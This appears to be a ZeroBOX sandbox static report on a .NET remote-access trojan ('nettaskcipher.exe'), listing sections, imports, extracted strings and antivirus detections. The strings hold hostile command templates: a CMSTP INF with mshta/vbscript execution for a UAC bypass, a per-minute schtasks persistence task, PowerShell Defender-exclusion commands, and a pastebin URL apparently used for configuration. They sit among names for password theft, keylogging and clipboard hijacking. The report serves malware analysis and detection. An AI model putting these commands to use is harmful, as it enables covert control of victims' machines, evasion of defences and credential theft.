Static | ZeroBOX

PE Compile Time

2023-02-08 23:23:54

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000c904 0x0000ca00 5.75927139444
.rsrc 0x00010000 0x000004f0 0x00000600 3.75162398564
.reloc 0x00012000 0x0000000c 0x00000200 0.0611628522412

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000100a0 0x0000025c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00010300 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
GetTickCount
ProcessCritical
ClientSocket
Messages
Helper
screen_preview
AppendOutputTextDelegate
EXECUTION_STATE
GetWindowCmd
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
TLS_DHE_PSK_WITH_AES_128_CBC_SHA
TLS_DHE_PSK_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_PSK_WITH_AES_128_CBC_SHA
TLS_PSK_WITH_AES_256_CBC_SHA
TLS_RSA_PSK_WITH_AES_128_CBC_SHA
TLS_RSA_PSK_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
TLS_SRP_SHA_WITH_AES_128_CBC_SHA
TLS_SRP_SHA_WITH_AES_256_CBC_SHA
TLS_DHE_PSK_WITH_AES_128_CBC_SHA256
TLS_DHE_PSK_WITH_AES_256_CBC_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA
TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256
TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA
TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_PSK_WITH_AES_128_CBC_SHA256
TLS_PSK_WITH_AES_256_CBC_SHA384
TLS_RSA_PSK_WITH_AES_128_CBC_SHA256
TLS_RSA_PSK_WITH_AES_256_CBC_SHA384
TLS_DHE_PSK_WITH_AES_128_GCM_SHA256
TLS_DHE_PSK_WITH_AES_256_GCM_SHA384
TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_PSK_WITH_AES_128_GCM_SHA256
TLS_PSK_WITH_AES_256_GCM_SHA384
TLS_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_RSA_PSK_WITH_AES_128_GCM_SHA256
TLS_RSA_PSK_WITH_AES_256_GCM_SHA384
TLS_RSA_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_AES_128_GCM_SHA256
TLS_AES_256_GCM_SHA384
TLS_CHACHA20_POLY1305_SHA256
TLS_AES_128_CCM_SHA256
TLS_AES_128_CCM_8_SHA256
hosting
TaskName
Mutexx
System.Threading
_appMutex
current
AdminCheck
PostMessageW
wParam
lParam
user32.dll
FindWindowEx
parentHandle
childAfter
lclassName
windowTitle
user32
SetInfFile
CommandToExecute
Execute
BinaryPath
SetCurrentProcessIsCritical
isCritical
refWasCritical
needSystemCriticalBreaks
Microsoft.Win32
SessionEndingEventArgs
SystemEvents_SessionEnding
sender
CriticalProcess_Enable
CriticalProcesses_Disable
isConnected
System.Net.Sockets
Socket
BufferLength
BufferLengthReceived
Buffer
System.IO
MemoryStream
ManualResetEvent
allDone
SendSync
BeginConnect
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
System.Diagnostics
Process
_MyProcess
get_MyProcess
set_MyProcess
WithEventsValue
processid
AppendOutputText
DataReceivedEventArgs
MyProcess_ErrorDataReceived
MyProcess_OutputDataReceived
WSound
mouse_event
dwFlags
cButtons
dwExtraInfo
keybd_event
Thread
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
getFolders
location
getFiles
getDrives
Download
MyProcess
SetThreadExecutionState
esFlags
PreventSleep
GetHashT
strToHash
frombase64
Plugin
AES_Encryptor
AES_Decryptor
INDATE
gettag
Comment
Random
GetWindow
GetParent
SetFocusAPI
SetForegroundWindow
GetBIT
Antivirus
CreateMutex
CloseMutex
userAgents
IPHOST
PortHost
IsValid
Address
SystemParametersInfo
uAction
uParam
pvParam
fWinIni
SystemParametersInfoA
BitBlt
nXDest
nYDest
hdcSrc
gdi32.dll
System.Drawing
Capture
System.Drawing.Imaging
ImageCodecInfo
GetEncoderInfo
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
value__
ES_CONTINUOUS
ES_DISPLAY_REQUIRED
ES_SYSTEM_REQUIRED
GW_HWNDFIRST
GW_HWNDLAST
GW_HWNDNEXT
GW_HWNDPREV
GW_OWNER
GW_CHILD
GW_ENABLEDPOPUP
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
VB$AnonymousDelegate_0
_Lambda$__1
DebuggerDisplayAttribute
Interaction
Environ
String
Concat
Exception
ProcessStartInfo
Environment
GetFileName
ReadAllBytes
WriteAllBytes
ProjectData
SetProjectError
ClearProjectError
ProcessWindowStyle
set_WindowStyle
GetFileNameWithoutExtension
set_Arguments
WaitForExit
set_FileName
get_ModuleName
ThreadStart
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
System.Text
StringBuilder
GetRandomFileName
Convert
ToChar
Append
Replace
WriteAllText
Exists
IntPtr
op_Explicit
WaitHandle
WaitOne
STAThreadAttribute
MarshalAsAttribute
UnmanagedType
SessionEndingEventHandler
SystemEvents
add_SessionEnding
EnterDebugMode
DllImportAttribute
NTdll.dll
RtlSetProcessIsCritical
_Lambda$__2
_Lambda$__3
DebuggerStepThroughAttribute
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
Conversions
ToInteger
Connect
SocketFlags
EventWaitHandle
ComputerInfo
get_MachineName
get_OSFullName
Boolean
System.Net
WebClient
DownloadString
EndReceive
ToArray
ToLong
Stream
Dispose
WriteByte
get_Length
WaitCallback
ThreadPool
QueueUserWorkItem
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
IDisposable
HttpWebRequest
HttpWebResponse
ServicePointManager
set_Expect100Continue
SecurityProtocolType
set_SecurityProtocol
set_DefaultConnectionLimit
WebRequest
Create
set_UserAgent
WebResponse
GetResponse
GetResponseStream
StreamReader
ReadToEnd
Collect
_Closure$__1
$VB$Local_A
_Lambda$__6
_Lambda$__4
_Lambda$__5
DataReceivedEventHandler
remove_OutputDataReceived
remove_ErrorDataReceived
add_OutputDataReceived
add_ErrorDataReceived
Operators
AddObject
get_Data
StreamWriter
Bitmap
FileAttribute
Rectangle
DateTime
System.Collections
IEnumerator
Strings
CompareMethod
CompareString
System.Windows.Forms
Restart
SocketShutdown
Shutdown
NewLateBinding
LateCall
ChangeType
Screen
get_PrimaryScreen
get_Bounds
get_Size
ConcatenateObject
LateGet
Cursor
set_Position
ToBoolean
ToByte
UIntPtr
GetTempFileName
DownloadFile
CreateObject
LateSet
AppWinStyle
ToInt32
get_StartInfo
set_UseShellExecute
set_RedirectStandardError
set_RedirectStandardOutput
set_CreateNoWindow
set_RedirectStandardInput
get_Id
BeginErrorReadLine
BeginOutputReadLine
get_StartTime
get_StandardInput
TextWriter
WriteLine
GetProcesses
get_ProcessName
GetExtension
GetProcessById
Delete
Directory
ServerComputer
Microsoft.VisualBasic.MyServices
FileSystemProxy
get_FileSystem
RenameDirectory
RenameFile
ReadAllText
GetThumbnailImageAbort
GetThumbnailImage
ImageFormat
get_Png
FileSystem
SetAttr
CreateDirectory
FileStream
ToBase64String
GetTempPath
CopyDirectory
MoveDirectory
get_Audio
Registry
GetValue
IEnumerable
GetEnumerator
get_Current
MoveNext
Network
get_Network
MessageBox
DialogResult
UploadFile
SetValue
DirectoryInfo
GetDirectories
get_Name
FileInfo
GetFiles
DriveInfo
System.Collections.Generic
IEnumerator`1
DriveType
System.Collections.ObjectModel
ReadOnlyCollection`1
get_Drives
get_DriveType
avicap32.dll
AccessedThroughPropertyAttribute
_Lambda$__7
Encoding
get_Default
GetBytes
GetString
get_ProcessorCount
get_UserName
OperatingSystem
get_OSVersion
get_SystemDirectory
GetPathRoot
get_TotalSize
System.Security.Cryptography
MD5CryptoServiceProvider
get_ASCII
HashAlgorithm
ComputeHash
Substring
ToUpper
FromBase64String
System.Reflection
Module
Assembly
GetModules
GetTypes
get_FullName
EndsWith
get_Assembly
RijndaelManaged
ICryptoTransform
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateEncryptor
TransformFinalBlock
CreateDecryptor
FileSystemInfo
get_LastWriteTime
get_Info
get_TotalPhysicalMemory
UInt64
Conversion
Double
Remove
RegistryKey
LocalMachine
OpenSubKey
Contains
System.Management
ManagementObject
ManagementBaseObject
get_Item
ManagementObjectSearcher
ManagementObjectCollection
ManagementObjectEnumerator
IPHostEntry
IPAddress
GetHostName
GetHostEntry
get_AddressList
get_AddressFamily
get_DnsSafeHost
get_UTF8
kernel32.dll
EncoderParameter
EncoderParameters
Graphics
get_Width
get_Height
FromImage
FromHwnd
GetHdc
ReleaseHdc
Cursors
get_Position
op_Inequality
Encoder
Quality
get_Param
GetImageEncoders
get_MimeType
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
nettaskcipher
nettaskcipher.exe
MyTemplate
14.0.0.0
My.Application
My.User
My.WebServices
My.Computer
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
MyProcess
WrapNonExceptionThrows
$26b3b426-742e-4b41-a2c9-3361e7fa3a97
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
https://pastebin.com/raw/fB4ZyQEn
password
<SecureNgrok>
USBDriver.exe
jjcDBygdHXnsJ5oY
WinDir
\system32\cmstp.exe
appdata
schtasks.exe
/create /f /sc minute /mo 1 /tn "
" /tr "
powershell.exe
-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '
-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
REPLACE_COMMAND_LINE
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
mshta vbscript:Execute(###CreateObject(####WScript.Shell####).Run ####cmd.exe /c start ################ ########REPLACE_COMMAND_LINE############,0:close###)
mshta vbscript:Execute(###CreateObject(####WScript.Shell####).Run ####taskkill /IM cmstp.exe /F####, 0, true:close###)
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
##HKLM##, ##SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE##, ##ProfileInstallPath##, ##%UnexpectedError%##, ####
[Strings]
ServiceName=##HM##
ShortSvcName=##HM##
Microsoft
http://ip-api.com/csv/?fields=status,query
127.0.0.1
Error:
uninstall
update
screenlive
Height
Memory
getinfo
openhide
internetexplorer.application
navigate
visible
shellfuc
regfuc
WScript.Shell
RegWrite
REG_DWORD
RunBotKiller
script
Cilpper
Clipper
injRun
startusb
startsp
taskkill.exe
/pid
CMD.EXE
Process Started at:
runnnnnn
closeshell
GetText
setText
clearr
BScreen
FILE_MANAGER_const
GetDrives
FileManager
Delete
Folder
Execute
Rename
txtttt
viewimage
hidefolderfile
showfolderfile
creatnewfolder
creatfile
downloadfile
downloadedfile
sendfileto
install
NETINS
7zip\7z.exe
InsProg
RSSDis
GETWCamPlu
GETWmicPlu
Wsound
GETWsoundPlu
JustFun
MapsPLU
closeKL
HKEY_CURRENT_USER\SOFTWARE\
GETTCP
GetActiveWindows
killAct
InstallN
InstallngC
\ngrok.exe
passwords_data
Getpass
Pvbnet
wd_kill
Emails
Error!
LLCHAT
[Folder]
FileManagerSplitFileManagerSplit
FileManagerSplit
[Drive]
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Unknown HWID
Class1
dd/MM/yyy
Activated
Not active
TLS (lev) /
HARDWARE\Description\System\CentralProcessor\0
Identifier
(64 Bit)
(32 Bit)
(Unknown)
Win32_Processor.deviceid="CPU0"
Core(TM)
Unknow
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
InterNetwork
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
image/jpeg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
nettaskcipher.exe
LegalCopyright
OriginalFilename
nettaskcipher.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Zilla.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Artemis!64557121D459
Cylance unsafe
Zillya Trojan.Agent.Win32.3244067
Sangfor Virus.Win32.Save.a
K7AntiVirus Trojan ( 0059553f1 )
BitDefender IL:Trojan.MSILZilla.25629
K7GW Trojan ( 0059553f1 )
CrowdStrike win/malicious_confidence_100% (W)
Baidu Clean
VirIT Clean
Cyren W32/MSIL_Agent.EWV.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Agent.DZK
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Dropper.MSIL.Agent.gen
Alibaba TrojanDropper:MSIL/MalwareX.bf24daa8
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan IL:Trojan.MSILZilla.25629
Rising Downloader.Agent!1.D0BE (CLASSIC)
Emsisoft IL:Trojan.MSILZilla.25629 (B)
F-Secure Clean
DrWeb BackDoor.SiggenNET.60
VIPRE IL:Trojan.MSILZilla.25629
TrendMicro TROJ_GEN.R03BC0PBP23
McAfee-GW-Edition RDN/Generic Dropper
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.64557121d4593837
Sophos ML/PE-A
SentinelOne Static AI - Malicious PE
GData MSIL.Backdoor.SiRAT.A
Jiangmin Clean
Webroot Clean
Avira HEUR/AGEN.1255018
MAX malware (ai score=85)
Antiy-AVL GrayWare/Win32.Wacapew
Gridinsoft Trojan.Win32.Agent.cl
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D641D
ViRobot Trojan.Win.Z.Agent.54272
ZoneAlarm Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.MSILZilla.C5275803
Acronis suspicious
BitDefenderTheta Gen:NN.ZemsilF.36344.dm0@a8Q@8Gb
ALYac IL:Trojan.MSILZilla.25629
TACHYON Clean
VBA32 Malware-Cryptor.MSIL.AgentTesla.Heur
Malwarebytes Clean
Panda Trj/Chgt.AC
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R03BC0PBP23
Tencent Msil.Trojan-Dropper.Agent.Vmhl
Yandex Trojan.Agent!NhIM5b1iNrY
Ikarus Trojan.MSIL.Agent
MaxSecure Trojan.Malware.73424424.susgen
Fortinet MSIL/Agent.DWN!tr
AVG Win32:MalwareX-gen [Trj]
Avast Win32:MalwareX-gen [Trj]
No IRMA results available.